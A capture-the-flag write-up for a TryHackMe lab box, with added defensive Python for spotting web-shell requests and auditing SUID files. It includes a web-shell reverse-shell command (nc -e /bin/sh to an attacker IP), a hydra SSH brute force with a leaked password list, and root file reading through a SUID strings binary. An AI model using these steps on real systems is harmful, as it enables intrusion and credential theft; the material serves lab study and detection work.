THM Writeup – Jack-of-All-Trades
Boot-to-root originally designed for Securi-Tay 2020
Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of a forgetful old toymaker and bring this lunatic down?
Add the IP address to your hosts file:
echo '10.10.10.140 jack.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv jack.thm
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 22,80 jack.thm
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (EdDSA)
Two ports are open, but the services are swapped: usually a web server listens on port 80 and SSH on port 22. In this case:
- SSH is on port 80
- the web server is on port 22
Run a directory scan against the web application:
gobuster dir -u http://jack.thm:22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/recovery.php (Status: 200)
/server-status (Status: 403)
===============================================================
When we try to browse to the web application on port 22, the browser refuses the connection: port 22 is on its list of restricted ports. Allow port 22 in the browser first (in Firefox, add 22 to network.security.ports.banned.override in about:config).
Now browse to http://jack.thm:22
The page says “If you employ me you might find random notes lying around as reminders”, so let’s view the page source:
We find a string that looks base64-encoded.
Use e.g. CyberChef to decode it:
Now browse to http://jack.thm:22/recovery.php
I tried to log in as jack and johny with the password we found earlier, but no luck. So I viewed the page source again:
Again we find a string that looks base64-encoded:
So let’s browse to http://bit.ly/2TvYQ2S – it redirects us to https://en.wikipedia.org/wiki/Stegosauria:
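Both notes above were spotted and decoded by hand. As an added example (not part of the original writeup), the following Python sweeps a page source for base64-looking tokens and keeps only those that decode to readable text; the HTML and the encoded string are constructed for the example.

```python
import base64
import binascii
import re

# Constructed page source for this example; the note and the encoded
# string are made up and are not the box's real ones.
SAMPLE_HTML = """<html><body>
<!-- Note to self:
UmVtZW1iZXIgdG8gY2hlY2sgdGhlIHJlY292ZXJ5IHBhZ2Uu -->
<img src="assets/header.jpg"><p>Jack of all trades, master of none.</p>
</body></html>"""

# Runs of base64 alphabet characters long enough to be worth decoding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def is_printable(text):
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def find_b64_notes(source):
    """Return (encoded, decoded) pairs for every token that is valid base64
    and decodes to printable UTF-8 text; everything else is discarded."""
    notes = []
    for match in B64_RE.finditer(source):
        token = match.group(0)
        if len(token) % 4:
            continue  # valid base64 is always a multiple of 4 characters
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text
        if is_printable(decoded):
            notes.append((token, decoded.strip()))
    return notes


if __name__ == "__main__":
    for encoded, decoded in find_b64_notes(SAMPLE_HTML):
        print(f"{encoded} -> {decoded}")
```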
OK, the credentials are probably hidden in the stego(saurus) picture on the homepage.
Download the stegosaurus picture from the homepage and check whether anything is hidden in it, using the password/phrase we found earlier as the passphrase:
root@ip-10-10-112-247:~# steghide info stego.jpg
"stego.jpg":
format: jpeg
capacity: 1.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "creds.txt":
size: 58.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
Bingo. Let’s extract the hidden .txt file and read it:
root@ip-10-10-112-247:~# steghide extract -sf stego.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
root@ip-10-10-112-247:~# cat creds.txt
Hehe. Gotcha!
You're on the right path, but wrong image!
Lmao, so do the same with the image of a toy:
root@ip-10-10-112-247:~# steghide info jackinthebox.jpg
"jackinthebox.jpg":
format: jpeg
capacity: 5.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Nothing again. Let’s try the same with the header image, the first image on the homepage:
root@ip-10-10-112-247:~# steghide info header.jpg
"header.jpg":
format: jpeg
capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "cms.creds":
size: 93.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
Great, now extract the .creds file and read it:
root@ip-10-10-112-247:~# steghide extract -sf header.jpg
Enter passphrase:
wrote extracted data to "cms.creds".
root@ip-10-10-112-247:~# cat cms.creds
Here you go Jack. Good thing you thought ahead!
Username: [REDACTED]
Password: [REDACTED]
Now go back to the recovery page http://jack.thm:22/recovery.php and log in using the credentials we have just found:
User Flag
Hm, great, RCE through the web application. First try a basic command like id:
http://jack.thm:22/[REDACTED]/index.php?cmd=id
Run a listener:
nc -lnvp 4242
“Browse” to:
http://jack.thm:22/[REDACTED]/index.php?cmd=nc -e /bin/sh 10.10.112.247 4242
and we receive a reverse shell:
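From the defender's side, the two requests above leave a clear trace in the web server's access log. As an added example (not from the writeup), this Python flags requests that pass a command through a cmd-style query parameter and rates the one spawning a shell higher; the log lines and the placeholder directory name are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines for this example. The web-shell
# directory is a placeholder; the cmd values mirror the requests made above.
SAMPLE_LOG = """\
10.10.112.247 - - [03/Feb/2022:09:05:11 +0000] "GET /index.html HTTP/1.1" 200 5213 "-" "Mozilla/5.0"
10.10.112.247 - - [03/Feb/2022:09:06:02 +0000] "GET /recovery.php HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
10.10.112.247 - - [03/Feb/2022:09:12:40 +0000] "GET /REDACTED_DIR/index.php?cmd=id HTTP/1.1" 200 94 "-" "Mozilla/5.0"
10.10.112.247 - - [03/Feb/2022:09:14:03 +0000] "GET /REDACTED_DIR/index.php?cmd=nc%20-e%20/bin/sh%2010.10.112.247%204242 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Query keys a PHP web shell typically hands to system(); extend for your environment.
SHELL_PARAMS = {"cmd", "exec", "command"}
# Markers of a shell being spawned or connected back, as in the request above.
REVERSE_SHELL_RE = re.compile(r"\bnc\b.*\s-e\s|/bin/(ba)?sh\b")


def classify(line):
    """Return an alert dict for a request carrying a shell parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    cmds = [v for key in sorted(SHELL_PARAMS) for v in params.get(key, [])]
    if not cmds:
        return None
    cmd = " ".join(cmds)
    severity = "reverse_shell" if REVERSE_SHELL_RE.search(cmd) else "command_exec"
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
            "cmd": cmd, "severity": severity}


def scan(log_text):
    """Classify every line and keep only the alerts, in log order."""
    return [a for a in map(classify, log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```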
Look around:
ls -la /home
total 16
drwxr-xr-x 3 root root 4096 Feb 29 2020 .
drwxr-xr-x 23 root root 4096 Feb 29 2020 ..
drwxr-x--- 3 jack jack 4096 Feb 29 2020 jack
-rw-r--r-- 1 root root 408 Feb 29 2020 jacks_password_list
cat /home/jacks_password_list
*hc[REDACTED]=0K
eN<[REDACTED]I5,
X<([REDACTED]MGC
,,a[REDACTED]afb
ITM[REDACTED]?>@
0Hg[REDACTED]8yF
sjR[REDACTED]ITu
[8V[REDACTED][WB
yTq[REDACTED]}PD
Sc.[REDACTED]C4}
9;}[REDACTED]X.T
M41[REDACTED]3%p
GZx[REDACTED]SO<
.MV[REDACTED]cAC
2fh[REDACTED]f51
TDF[REDACTED]hBO
v]X[REDACTED]3EF
9iY[REDACTED]4d1
8TI[REDACTED]AY^
SeU[REDACTED]+yt
n.F[REDACTED]s5d
8lN[REDACTED][pM
z@e[REDACTED]Dz@
ow5[REDACTED]rSo
We found jack’s passwords, so let’s try hydra to crack SSH. First save the passwords to a file and then run hydra against SSH:
hydra -l jack -P jackpass ssh://jack.thm -s 80
[80][ssh] host: jack.thm login: jack password: [REDACTED]
Now use these credentials to login via SSH:
root@ip-10-10-112-247:~# ssh jack@jack.thm -p 80
jack@jack.thm's password:
jack@jack-of-all-trades:~$
Find the user flag:
jack@jack-of-all-trades:~$ ls -la
total 312
drwxr-x--- 3 jack jack 4096 Feb 29 2020 .
drwxr-xr-x 3 root root 4096 Feb 29 2020 ..
lrwxrwxrwx 1 root root 9 Feb 29 2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack 220 Feb 29 2020 .bash_logout
-rw-r--r-- 1 jack jack 3515 Feb 29 2020 .bashrc
drwx------ 2 jack jack 4096 Feb 29 2020 .gnupg
-rw-r--r-- 1 jack jack 675 Feb 29 2020 .profile
-rwxr-x--- 1 jack jack 293302 Feb 28 2020 user.jpg
user.jpg is probably our user flag, so download it to your attacking machine.
Run a Python HTTP server on the target machine:
jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 ...
Download user.jpg to your attacking machine:
root@ip-10-10-112-247:~# wget http://jack.thm:9000/user.jpg
--2022-02-03 09:20:12-- http://jack.thm:9000/user.jpg
Resolving jack.thm (jack.thm)... 10.10.10.140
Connecting to jack.thm (jack.thm)|10.10.10.140|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293302 (286K) [image/jpeg]
Saving to: ‘user.jpg’
user.jpg 100%[===================>] 286.43K --.-KB/s in 0.003s
2022-02-03 09:20:12 (96.8 MB/s) - ‘user.jpg’ saved [293302/293302]
Open the .jpg file:
Root Flag
Now, to escalate our privileges, I tried the basic vectors:
sudo -l
cat /etc/crontab
getcap -r / 2>/dev/null
but no luck.
Then I tried SUID bits:
jack@jack-of-all-trades:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
strings is the one that stands out. Check GTFOBins:
So we just need to “read” the file with the strings command:
jack@jack-of-all-trades:~$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: [REDACTED]
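The find output above is the kind of list an auditor compares against a baseline so that a stray setuid strings shows up automatically instead of by eye. This Python is an added example, not part of the writeup; its allowlist is constructed from the other entries of that output and should be replaced with one taken from a clean reference host of the same release.

```python
import os
import stat

# The find output shown above, kept verbatim as sample input.
SAMPLE_FIND = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
"""

# Allowlist constructed for this example from the entries above that the
# writeup treats as normal; in practice generate it on a clean reference host.
EXPECTED_SUID = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/pt_chown", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/gpasswd",
    "/usr/bin/procmail", "/usr/sbin/exim4", "/bin/mount", "/bin/umount", "/bin/su",
}


def audit_suid(find_output, expected=EXPECTED_SUID):
    """Return the SUID paths that are not on the allowlist, sorted."""
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(found - expected)


def live_suid_paths(root="/"):
    """Collect setuid regular files under root, like find -type f -perm -4000."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return "\n".join(hits)
```

Run audit_suid(live_suid_paths()) as root on a host to compare it against the same allowlist; audit_suid(SAMPLE_FIND) reproduces the manual finding from the writeup.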